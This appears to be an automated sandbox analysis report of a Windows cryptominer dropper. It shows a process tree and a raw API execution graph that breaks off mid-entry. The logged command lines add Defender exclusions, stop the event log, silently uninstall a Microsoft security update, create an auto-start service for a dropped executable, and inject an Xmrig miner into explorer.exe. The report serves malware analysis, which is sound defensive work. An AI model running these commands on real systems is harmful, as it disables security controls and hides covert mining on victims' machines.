                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:16:48:14
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\sc.exe delete "CENLNOGJ"
                                                                                                                              Imagebase:0x7ff7309b0000
                                                                                                                              File size:72'192 bytes
                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:17
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:18
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:19
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:20
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:21
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\wusa.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                              Imagebase:0x7ff690770000
                                                                                                                              File size:345'088 bytes
                                                                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:22
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto"
                                                                                                                              Imagebase:0x7ff7309b0000
                                                                                                                              File size:72'192 bytes
                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:23
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:24
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                                              Imagebase:0x7ff7309b0000
                                                                                                                              File size:72'192 bytes
                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:25
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\sc.exe start "CENLNOGJ"
                                                                                                                              Imagebase:0x7ff7309b0000
                                                                                                                              File size:72'192 bytes
                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:26
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:27
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:28
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe
                                                                                                                              Imagebase:0x7ff74f580000
                                                                                                                              File size:2'653'184 bytes
                                                                                                                              MD5 hash:3B43DA1BE0C39802B78F6B2C55C4D7E6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              • Detection: 58%, Virustotal, Browse
                                                                                                                              Has exited:true

                                                                                                                              Target ID:29
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:30
                                                                                                                              Start time:16:48:15
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:33
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                              Imagebase:0x7ff7c00d0000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:34
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:35
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:36
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:37
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:38
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:39
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:40
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              Target ID:41
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:42
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:43
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:44
                                                                                                                              Start time:16:48:26
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:explorer.exe
                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                              File size:5'141'208 bytes
                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000002.4196308144.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.3173090923.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.3172825597.00000000122A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.2566481602.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000003.2566319843.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:false

                                                                                                                              Target ID:45
                                                                                                                              Start time:16:48:27
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\wusa.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                              Imagebase:0x7ff690770000
                                                                                                                              File size:345'088 bytes
                                                                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:3.4%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:9.5%
                                                                                                                                Total number of Nodes:1975
                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                execution_graph 5083 7ff7970c2050 5084 7ff7970c20cf 5083->5084 5085 7ff7970c205e EnterCriticalSection 5083->5085 5086 7ff7970c20c2 LeaveCriticalSection 5085->5086 5087 7ff7970c2079 5085->5087 5086->5084 5087->5086 5088 7ff7970c20bd free 5087->5088 5088->5086 5089 7ff7970c1fd0 5090 7ff7970c1fe4 5089->5090 5091 7ff7970c2033 5089->5091 5090->5091 5092 7ff7970c1ffd EnterCriticalSection LeaveCriticalSection 5090->5092 5092->5091 5114 7ff7970c1a70 5115 7ff7970c199e 5114->5115 5119 7ff7970c1a7d 5114->5119 5116 7ff7970c1a0f 5115->5116 5117 7ff7970c19e9 VirtualProtect 5115->5117 5117->5115 5118 7ff7970c1b53 5119->5114 5119->5118 5120 7ff7970c1b36 5119->5120 5121 7ff7970c1ba0 4 API calls 5120->5121 5121->5118 5138 7ff7970c1e10 5139 7ff7970c1e2f 5138->5139 5140 7ff7970c1eb5 5139->5140 5141 7ff7970c1ecc 5139->5141 5144 7ff7970c1e55 5139->5144 5141->5140 5142 7ff7970c1ed3 signal 5141->5142 5142->5140 5143 7ff7970c1ee4 5142->5143 5143->5140 5145 7ff7970c1eea signal 5143->5145 5144->5140 5146 7ff7970c1f12 signal 5144->5146 5145->5140 5146->5140 5122 7ff7970c216f 5123 7ff7970c2185 5122->5123 5124 7ff7970c2178 InitializeCriticalSection 5122->5124 5124->5123 5063 7ff7970c1394 5064 7ff7970c83f0 malloc 5063->5064 5065 7ff7970c13b8 5064->5065 5066 7ff7970c13c6 NtDeviceIoControlFile 5065->5066 5067 7ff7970c1ab3 5068 7ff7970c1a70 5067->5068 5068->5067 5069 7ff7970c1b36 5068->5069 5071 7ff7970c199e 5068->5071 5073 7ff7970c1b53 5068->5073 5072 7ff7970c1ba0 4 API calls 5069->5072 5070 7ff7970c1a0f 5071->5070 5074 7ff7970c19e9 VirtualProtect 5071->5074 5072->5073 5074->5071 3107 7ff7970c1140 3110 7ff7970c1160 3107->3110 3109 7ff7970c1156 3111 7ff7970c11b9 3110->3111 3112 7ff7970c118b 3110->3112 3114 7ff7970c11d3 3111->3114 3115 7ff7970c11c7 _amsg_exit 3111->3115 3112->3111 3113 7ff7970c1190 3112->3113 3113->3111 3116 7ff7970c11a0 Sleep 3113->3116 3117 7ff7970c1201 _initterm 3114->3117 3118 7ff7970c121a 3114->3118 3115->3114 3116->3111 3116->3113 3117->3118 3135 7ff7970c1880 3118->3135 3121 7ff7970c126a 3122 7ff7970c126f malloc 3121->3122 3123 7ff7970c128b 3122->3123 3126 7ff7970c12d2 3122->3126 3124 7ff7970c12a0 strlen malloc memcpy 3123->3124 3124->3124 3125 7ff7970c12d0 3124->3125 3125->3126 3148 7ff7970c3b50 3126->3148 3128 7ff7970c1315 3129 7ff7970c1344 3128->3129 3130 7ff7970c1324 3128->3130 3133 7ff7970c1160 94 API calls 3129->3133 3131 7ff7970c1338 3130->3131 3132 7ff7970c132d _cexit 3130->3132 3131->3109 3132->3131 3134 7ff7970c1366 3133->3134 3134->3109 3136 7ff7970c1247 SetUnhandledExceptionFilter 3135->3136 3137 7ff7970c18a2 3135->3137 3136->3121 3137->3136 3138 7ff7970c194d 3137->3138 3143 7ff7970c1a20 3137->3143 3139 7ff7970c199e 3138->3139 3140 7ff7970c1956 3138->3140 3139->3136 3142 7ff7970c19e9 VirtualProtect 3139->3142 3140->3139 3326 7ff7970c1ba0 3140->3326 3142->3139 3143->3139 3144 7ff7970c1b5c 3143->3144 3145 7ff7970c1b36 3143->3145 3146 7ff7970c1ba0 4 API calls 3145->3146 3147 7ff7970c1b53 3146->3147 3147->3144 3151 7ff7970c3b66 3148->3151 3149 7ff7970c3c60 wcslen 3336 7ff7970c153f 3149->3336 3151->3149 3155 7ff7970c3d60 3158 7ff7970c3d7a memset wcscat memset 3155->3158 3161 7ff7970c3dd3 3158->3161 3160 7ff7970c3e23 wcslen 3162 7ff7970c3e35 3160->3162 3166 7ff7970c3e7c 3160->3166 3161->3160 3163 7ff7970c3e50 _wcsnicmp 3162->3163 3164 7ff7970c3e66 wcslen 3163->3164 3163->3166 3164->3163 3164->3166 3165 7ff7970c3edd wcscpy wcscat memset 3168 7ff7970c3f1c 3165->3168 3166->3165 3167 7ff7970c4024 wcscpy wcscat 3169 7ff7970c404f memset 3167->3169 3173 7ff7970c4131 3167->3173 3168->3167 3171 7ff7970c4070 3169->3171 3170 7ff7970c40d3 wcslen 3172 7ff7970c40e9 3170->3172 3183 7ff7970c412c 3170->3183 3171->3170 3175 7ff7970c4100 _wcsnicmp 3172->3175 3558 7ff7970c2df0 3173->3558 3176 7ff7970c4116 wcslen 3175->3176 3175->3183 3176->3175 3176->3183 3177 7ff7970c4376 wcscpy wcscat _wcsicmp 3178 7ff7970c43c3 memset 3177->3178 3179 7ff7970c43aa 3177->3179 3182 7ff7970c43e4 3178->3182 3570 7ff7970c14d6 3179->3570 3181 7ff7970c4429 wcscpy wcscat memset 3185 7ff7970c446f 3181->3185 3182->3181 3183->3177 3184 7ff7970c44d2 wcscpy wcscat memset 3186 7ff7970c4518 3184->3186 3185->3184 3187 7ff7970c4548 wcscpy wcscat 3186->3187 3188 7ff7970c6766 memcpy 3187->3188 3189 7ff7970c457a 3187->3189 3188->3189 3190 7ff7970c2df0 11 API calls 3189->3190 3192 7ff7970c472d 3190->3192 3191 7ff7970c2df0 11 API calls 3193 7ff7970c4845 memset 3191->3193 3192->3191 3195 7ff7970c4866 3193->3195 3194 7ff7970c48a9 wcscpy wcscat memset 3196 7ff7970c48f2 3194->3196 3195->3194 3197 7ff7970c4935 wcscpy wcscat wcslen 3196->3197 3635 7ff7970c146d 3197->3635 3200 7ff7970c4a49 3202 7ff7970c4b43 wcslen 3200->3202 3210 7ff7970c4d34 3200->3210 3843 7ff7970c157b 3202->3843 3205 7ff7970c145e 2 API calls 3205->3200 3208 7ff7970c4d13 memset 3208->3210 3209 7ff7970c4da4 wcscpy wcscat 3213 7ff7970c4dd6 3209->3213 3210->3209 3211 7ff7970c4ca6 wcslen 3893 7ff7970c15e4 3211->3893 3215 7ff7970c2df0 11 API calls 3213->3215 3218 7ff7970c4ede 3215->3218 3216 7ff7970c145e 2 API calls 3216->3208 3217 7ff7970c4c02 3217->3208 3217->3211 3219 7ff7970c2df0 11 API calls 3218->3219 3220 7ff7970c4fef 3219->3220 3221 7ff7970c2df0 11 API calls 3220->3221 3223 7ff7970c50d9 3221->3223 3222 7ff7970c2df0 11 API calls 3225 7ff7970c51c3 3222->3225 3223->3222 3224 7ff7970c5304 wcslen 3226 7ff7970c157b 2 API calls 3224->3226 3225->3224 3227 7ff7970c538e 3226->3227 3228 7ff7970c5396 memset 3227->3228 3232 7ff7970c54a8 3227->3232 3229 7ff7970c53b7 3228->3229 3230 7ff7970c5407 wcslen 3229->3230 3896 7ff7970c15a8 3230->3896 3231 7ff7970c2df0 11 API calls 3239 7ff7970c5553 3231->3239 3232->3231 3241 7ff7970c5647 _wcsicmp 3232->3241 3235 7ff7970c5477 _wcsnicmp 3236 7ff7970c549c 3235->3236 3243 7ff7970c5ce1 3235->3243 3237 7ff7970c145e 2 API calls 3236->3237 3237->3232 3238 7ff7970c2df0 11 API calls 3238->3241 3239->3238 3240 7ff7970c5d3e wcslen 3242 